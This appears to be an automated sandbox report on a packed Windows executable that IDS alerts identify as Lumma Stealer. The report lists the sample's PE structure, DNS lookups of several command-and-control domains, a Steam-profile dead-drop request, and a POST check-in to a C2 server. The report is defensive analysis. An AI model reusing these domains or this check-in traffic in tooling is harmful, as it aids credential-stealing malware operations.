TLSH:	0D85334648F160D2FA7A59F6A32AC4C49E3967433676CCAA6C44483774817FEE1490FF
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f.............................0K...........@..........................`K...........@.................................W...k..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8b3000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FD834D6255Ah
pshufw mm3, qword ptr [eax+eax], 00h
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5f057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5f1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x5d000	0x25e00	a8a9b76b0dea1e5ba7a896992a2f81ad	False	0.9996196885313532	data	7.984055290084938	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5e000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5f000	0x1000	0x200	fe72def8b74193a84232a780098a7ce0	False	0.150390625	data	1.04205214219471	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x60000	0x2b2000	0x200	ff59d4fa1250167a0d0810c6e32e7530	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
uaabloyt	0x312000	0x1a0000	0x19f800	65aa211f60b9c91400fe9f28ec89e625	False	0.9942581415463297	data	7.954325094548198	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wktppswf	0x4b2000	0x1000	0x600	13dbfe14fac1ce4172c5593c37a3fc6b	False	0.5950520833333334	data	5.069223584995856	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4b3000	0x3000	0x2200	d3b688343728c2039d25ba6275d42582	False	0.006433823529411764	DOS executable (COM)	0.019571456231530684	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-07T23:23:13.871380+0200	2056471	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)	1	192.168.2.7	49480	1.1.1.1	53	UDP
2024-10-07T23:23:13.888459+0200	2056485	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)	1	192.168.2.7	50125	1.1.1.1	53	UDP
2024-10-07T23:23:13.899468+0200	2056483	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)	1	192.168.2.7	57855	1.1.1.1	53	UDP
2024-10-07T23:23:13.918586+0200	2056481	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)	1	192.168.2.7	53817	1.1.1.1	53	UDP
2024-10-07T23:23:13.927966+0200	2056479	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)	1	192.168.2.7	61461	1.1.1.1	53	UDP
2024-10-07T23:23:13.938398+0200	2056477	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)	1	192.168.2.7	53630	1.1.1.1	53	UDP
2024-10-07T23:23:13.949817+0200	2056475	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)	1	192.168.2.7	56085	1.1.1.1	53	UDP
2024-10-07T23:23:13.961689+0200	2056473	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)	1	192.168.2.7	62918	1.1.1.1	53	UDP
2024-10-07T23:23:16.436330+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49704	104.21.53.8	443	TCP
2024-10-07T23:23:16.436330+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49704	104.21.53.8	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 23:23:13.984513044 CEST	49702	443	192.168.2.7	104.102.49.254
Oct 7, 2024 23:23:13.984544039 CEST	443	49702	104.102.49.254	192.168.2.7
Oct 7, 2024 23:23:13.984625101 CEST	49702	443	192.168.2.7	104.102.49.254
Oct 7, 2024 23:23:13.987859964 CEST	49702	443	192.168.2.7	104.102.49.254
Oct 7, 2024 23:23:13.987875938 CEST	443	49702	104.102.49.254	192.168.2.7
Oct 7, 2024 23:23:14.631494045 CEST	443	49702	104.102.49.254	192.168.2.7
Oct 7, 2024 23:23:14.631558895 CEST	49702	443	192.168.2.7	104.102.49.254
Oct 7, 2024 23:23:14.635225058 CEST	49702	443	192.168.2.7	104.102.49.254
Oct 7, 2024 23:23:14.635229111 CEST	443	49702	104.102.49.254	192.168.2.7
Oct 7, 2024 23:23:14.635452032 CEST	443	49702	104.102.49.254	192.168.2.7
Oct 7, 2024 23:23:14.681768894 CEST	49702	443	192.168.2.7	104.102.49.254
Oct 7, 2024 23:23:14.723423958 CEST	443	49702	104.102.49.254	192.168.2.7
Oct 7, 2024 23:23:15.147896051 CEST	443	49702	104.102.49.254	192.168.2.7
Oct 7, 2024 23:23:15.147950888 CEST	443	49702	104.102.49.254	192.168.2.7
Oct 7, 2024 23:23:15.147980928 CEST	49702	443	192.168.2.7	104.102.49.254
Oct 7, 2024 23:23:15.147991896 CEST	443	49702	104.102.49.254	192.168.2.7
Oct 7, 2024 23:23:15.148010015 CEST	443	49702	104.102.49.254	192.168.2.7
Oct 7, 2024 23:23:15.148022890 CEST	49702	443	192.168.2.7	104.102.49.254
Oct 7, 2024 23:23:15.148029089 CEST	443	49702	104.102.49.254	192.168.2.7
Oct 7, 2024 23:23:15.148042917 CEST	49702	443	192.168.2.7	104.102.49.254
Oct 7, 2024 23:23:15.148073912 CEST	49702	443	192.168.2.7	104.102.49.254
Oct 7, 2024 23:23:15.148098946 CEST	49702	443	192.168.2.7	104.102.49.254
Oct 7, 2024 23:23:15.246649027 CEST	443	49702	104.102.49.254	192.168.2.7
Oct 7, 2024 23:23:15.246670961 CEST	443	49702	104.102.49.254	192.168.2.7
Oct 7, 2024 23:23:15.246718884 CEST	49702	443	192.168.2.7	104.102.49.254
Oct 7, 2024 23:23:15.246730089 CEST	443	49702	104.102.49.254	192.168.2.7
Oct 7, 2024 23:23:15.246778965 CEST	49702	443	192.168.2.7	104.102.49.254
Oct 7, 2024 23:23:15.251544952 CEST	443	49702	104.102.49.254	192.168.2.7
Oct 7, 2024 23:23:15.251600027 CEST	49702	443	192.168.2.7	104.102.49.254
Oct 7, 2024 23:23:15.251605034 CEST	443	49702	104.102.49.254	192.168.2.7
Oct 7, 2024 23:23:15.251615047 CEST	443	49702	104.102.49.254	192.168.2.7
Oct 7, 2024 23:23:15.251652956 CEST	49702	443	192.168.2.7	104.102.49.254
Oct 7, 2024 23:23:15.278107882 CEST	49702	443	192.168.2.7	104.102.49.254
Oct 7, 2024 23:23:15.278122902 CEST	443	49702	104.102.49.254	192.168.2.7
Oct 7, 2024 23:23:15.278136015 CEST	49702	443	192.168.2.7	104.102.49.254
Oct 7, 2024 23:23:15.278141022 CEST	443	49702	104.102.49.254	192.168.2.7
Oct 7, 2024 23:23:15.291516066 CEST	49704	443	192.168.2.7	104.21.53.8
Oct 7, 2024 23:23:15.291568041 CEST	443	49704	104.21.53.8	192.168.2.7
Oct 7, 2024 23:23:15.291735888 CEST	49704	443	192.168.2.7	104.21.53.8
Oct 7, 2024 23:23:15.297349930 CEST	49704	443	192.168.2.7	104.21.53.8
Oct 7, 2024 23:23:15.297365904 CEST	443	49704	104.21.53.8	192.168.2.7
Oct 7, 2024 23:23:15.752377033 CEST	443	49704	104.21.53.8	192.168.2.7
Oct 7, 2024 23:23:15.752469063 CEST	49704	443	192.168.2.7	104.21.53.8
Oct 7, 2024 23:23:15.851497889 CEST	49704	443	192.168.2.7	104.21.53.8
Oct 7, 2024 23:23:15.851524115 CEST	443	49704	104.21.53.8	192.168.2.7
Oct 7, 2024 23:23:15.852304935 CEST	443	49704	104.21.53.8	192.168.2.7
Oct 7, 2024 23:23:15.853399038 CEST	49704	443	192.168.2.7	104.21.53.8
Oct 7, 2024 23:23:15.853424072 CEST	49704	443	192.168.2.7	104.21.53.8
Oct 7, 2024 23:23:15.853579044 CEST	443	49704	104.21.53.8	192.168.2.7
Oct 7, 2024 23:23:16.436413050 CEST	443	49704	104.21.53.8	192.168.2.7
Oct 7, 2024 23:23:16.436635971 CEST	443	49704	104.21.53.8	192.168.2.7
Oct 7, 2024 23:23:16.436703920 CEST	49704	443	192.168.2.7	104.21.53.8
Oct 7, 2024 23:23:16.436739922 CEST	49704	443	192.168.2.7	104.21.53.8
Oct 7, 2024 23:23:16.436755896 CEST	443	49704	104.21.53.8	192.168.2.7
Oct 7, 2024 23:23:16.436767101 CEST	49704	443	192.168.2.7	104.21.53.8
Oct 7, 2024 23:23:16.436773062 CEST	443	49704	104.21.53.8	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 23:23:13.871380091 CEST	49480	53	192.168.2.7	1.1.1.1
Oct 7, 2024 23:23:13.883610964 CEST	53	49480	1.1.1.1	192.168.2.7
Oct 7, 2024 23:23:13.888458967 CEST	50125	53	192.168.2.7	1.1.1.1
Oct 7, 2024 23:23:13.897351027 CEST	53	50125	1.1.1.1	192.168.2.7
Oct 7, 2024 23:23:13.899467945 CEST	57855	53	192.168.2.7	1.1.1.1
Oct 7, 2024 23:23:13.917016029 CEST	53	57855	1.1.1.1	192.168.2.7
Oct 7, 2024 23:23:13.918586016 CEST	53817	53	192.168.2.7	1.1.1.1
Oct 7, 2024 23:23:13.926897049 CEST	53	53817	1.1.1.1	192.168.2.7
Oct 7, 2024 23:23:13.927966118 CEST	61461	53	192.168.2.7	1.1.1.1
Oct 7, 2024 23:23:13.936461926 CEST	53	61461	1.1.1.1	192.168.2.7
Oct 7, 2024 23:23:13.938397884 CEST	53630	53	192.168.2.7	1.1.1.1
Oct 7, 2024 23:23:13.947263002 CEST	53	53630	1.1.1.1	192.168.2.7
Oct 7, 2024 23:23:13.949816942 CEST	56085	53	192.168.2.7	1.1.1.1
Oct 7, 2024 23:23:13.959419012 CEST	53	56085	1.1.1.1	192.168.2.7
Oct 7, 2024 23:23:13.961688995 CEST	62918	53	192.168.2.7	1.1.1.1
Oct 7, 2024 23:23:13.970269918 CEST	53	62918	1.1.1.1	192.168.2.7
Oct 7, 2024 23:23:13.973159075 CEST	64283	53	192.168.2.7	1.1.1.1
Oct 7, 2024 23:23:13.980180979 CEST	53	64283	1.1.1.1	192.168.2.7
Oct 7, 2024 23:23:15.280800104 CEST	50612	53	192.168.2.7	1.1.1.1
Oct 7, 2024 23:23:15.289675951 CEST	53	50612	1.1.1.1	192.168.2.7
Oct 7, 2024 23:23:54.785949945 CEST	53	62309	162.159.36.2	192.168.2.7
Oct 7, 2024 23:23:55.257914066 CEST	53	49324	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 7, 2024 23:23:13.871380091 CEST	192.168.2.7	1.1.1.1	0x4e93	Standard query (0)	clearancek.site	A (IP address)	IN (0x0001)	false
Oct 7, 2024 23:23:13.888458967 CEST	192.168.2.7	1.1.1.1	0x34c9	Standard query (0)	mobbipenju.store	A (IP address)	IN (0x0001)	false
Oct 7, 2024 23:23:13.899467945 CEST	192.168.2.7	1.1.1.1	0xccd2	Standard query (0)	eaglepawnoy.store	A (IP address)	IN (0x0001)	false
Oct 7, 2024 23:23:13.918586016 CEST	192.168.2.7	1.1.1.1	0x5d6b	Standard query (0)	dissapoiznw.store	A (IP address)	IN (0x0001)	false
Oct 7, 2024 23:23:13.927966118 CEST	192.168.2.7	1.1.1.1	0x5426	Standard query (0)	studennotediw.store	A (IP address)	IN (0x0001)	false
Oct 7, 2024 23:23:13.938397884 CEST	192.168.2.7	1.1.1.1	0xc448	Standard query (0)	bathdoomgaz.store	A (IP address)	IN (0x0001)	false
Oct 7, 2024 23:23:13.949816942 CEST	192.168.2.7	1.1.1.1	0xff9e	Standard query (0)	spirittunek.store	A (IP address)	IN (0x0001)	false
Oct 7, 2024 23:23:13.961688995 CEST	192.168.2.7	1.1.1.1	0x9cf8	Standard query (0)	licendfilteo.site	A (IP address)	IN (0x0001)	false
Oct 7, 2024 23:23:13.973159075 CEST	192.168.2.7	1.1.1.1	0x5ef9	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Oct 7, 2024 23:23:15.280800104 CEST	192.168.2.7	1.1.1.1	0x4a4c	Standard query (0)	sergei-esenin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 7, 2024 23:23:13.883610964 CEST	1.1.1.1	192.168.2.7	0x4e93	Name error (3)	clearancek.site	none	none	A (IP address)	IN (0x0001)	false
Oct 7, 2024 23:23:13.897351027 CEST	1.1.1.1	192.168.2.7	0x34c9	Name error (3)	mobbipenju.store	none	none	A (IP address)	IN (0x0001)	false
Oct 7, 2024 23:23:13.917016029 CEST	1.1.1.1	192.168.2.7	0xccd2	Name error (3)	eaglepawnoy.store	none	none	A (IP address)	IN (0x0001)	false
Oct 7, 2024 23:23:13.926897049 CEST	1.1.1.1	192.168.2.7	0x5d6b	Name error (3)	dissapoiznw.store	none	none	A (IP address)	IN (0x0001)	false
Oct 7, 2024 23:23:13.936461926 CEST	1.1.1.1	192.168.2.7	0x5426	Name error (3)	studennotediw.store	none	none	A (IP address)	IN (0x0001)	false
Oct 7, 2024 23:23:13.947263002 CEST	1.1.1.1	192.168.2.7	0xc448	Name error (3)	bathdoomgaz.store	none	none	A (IP address)	IN (0x0001)	false
Oct 7, 2024 23:23:13.959419012 CEST	1.1.1.1	192.168.2.7	0xff9e	Name error (3)	spirittunek.store	none	none	A (IP address)	IN (0x0001)	false
Oct 7, 2024 23:23:13.970269918 CEST	1.1.1.1	192.168.2.7	0x9cf8	Name error (3)	licendfilteo.site	none	none	A (IP address)	IN (0x0001)	false
Oct 7, 2024 23:23:13.980180979 CEST	1.1.1.1	192.168.2.7	0x5ef9	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Oct 7, 2024 23:23:15.289675951 CEST	1.1.1.1	192.168.2.7	0x4a4c	No error (0)	sergei-esenin.com		104.21.53.8	A (IP address)	IN (0x0001)	false
Oct 7, 2024 23:23:15.289675951 CEST	1.1.1.1	192.168.2.7	0x4a4c	No error (0)	sergei-esenin.com		172.67.206.204	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

sergei-esenin.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49702	104.102.49.254	443	7100	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 21:23:14 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-10-07 21:23:15 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Mon, 07 Oct 2024 21:23:15 GMT Content-Length: 34837 Connection: close Set-Cookie: sessionid=325cf81e9f646aa2fce95d94; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-07 21:23:15 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-07 21:23:15 UTC	16384	IN	Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-07 21:23:15 UTC	3768	IN	Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: <div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-07 21:23:15 UTC	171	IN	Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49704	104.21.53.8	443	7100	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 21:23:15 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sergei-esenin.com
2024-10-07 21:23:15 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-07 21:23:16 UTC	772	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 21:23:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4c1mfmtctdkph64pqkd3kvq5ar; expires=Fri, 31 Jan 2025 15:09:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iHQYx1WtnNhiM0PBelyzBbrwNuhNIwCBNDdae%2BPNyIJBkANUNSqgz%2F5pLZB8pzJ25k6hGDfaHUziQmINWt71cCrI848Y2f3NVp3j0iWYXTI8HxH1TQB323ALsklDwARKGhS1hQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf0f3885fa58c65-EWR
2024-10-07 21:23:16 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-07 21:23:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	3
Start time:	17:23:08
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xda0000
File size:	1'872'384 bytes
MD5 hash:	92DD1108DBDEBF3163C394DEB38B0278
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	61.1%
Total number of Nodes:	54
Total number of Limit Nodes:	7

Executed Functions

Function 00DE50FA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(19A41BB1,00000000,00000800), ref: 00DE5182

Strings

@^, xrefs: 00DE5120
<I$), xrefs: 00DE5198
<I$), xrefs: 00DE52E3

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

